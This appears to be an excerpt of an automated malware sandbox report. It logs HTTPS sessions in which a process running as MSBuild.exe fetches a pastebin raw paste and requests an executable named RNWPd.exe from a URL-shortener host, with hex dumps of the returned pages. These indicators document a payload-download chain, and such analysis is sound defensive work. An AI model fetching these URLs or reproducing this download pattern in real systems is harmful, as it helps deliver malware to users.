                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHOoOpXO5YMQ9cv8iIX7ahQd4Xn71sd%2F5oH5CSVvmFSfLsg9Si9u5B09xHjFJvl7DVS1CbYq%2BSxbG%2FVFIyuebKbYxRTD88cfXTk%2FuWoBDa105EQMkdHW1dQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433aefce2e41bd-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:18 UTC470INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:18 UTC1369INData Raw: 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                    Data Ascii: er" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property
                    2024-09-16 19:23:18 UTC1369INData Raw: 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30
                    Data Ascii: olor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0
                    2024-09-16 19:23:18 UTC1369INData Raw: 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b
                    Data Ascii: AgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);
                    2024-09-16 19:23:18 UTC1369INData Raw: 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72
                    Data Ascii: tyle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-r
                    2024-09-16 19:23:18 UTC1369INData Raw: 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64
                    Data Ascii: margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="d
                    2024-09-16 19:23:18 UTC155INData Raw: 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: e.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:18 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.649785104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:23 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:23 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433b0f9bc77277-EWR
                    2024-09-16 19:23:23 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:23 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:23 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:23 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:23 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.649786188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:24 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:24 UTC896INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:24 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:24 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAmuDJq4m0linHAzyiBxo2XLsiOj3RVGn2oRpaVASHKHbvgtXoXNzbyaImSqMy2LdfD3N8nWzs9lHhClbaJybEbUGklADAOLnNVckOJ51YWXBO2UuVBU%2BLE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433b139c6a4352-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:24 UTC473INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:24 UTC1369INData Raw: 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                    Data Ascii: content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="o
                    2024-09-16 19:23:24 UTC1369INData Raw: 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73
                    Data Ascii: r:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s
                    2024-09-16 19:23:24 UTC1369INData Raw: 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e
                    Data Ascii: ntData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.
                    2024-09-16 19:23:24 UTC1369INData Raw: 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69
                    Data Ascii: e>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radi
                    2024-09-16 19:23:24 UTC1369INData Raw: 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61
                    Data Ascii: gin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="doma
                    2024-09-16 19:23:24 UTC152INData Raw: 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: osition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:24 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.649787104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:29 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:29 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433b33bda50f79-EWR
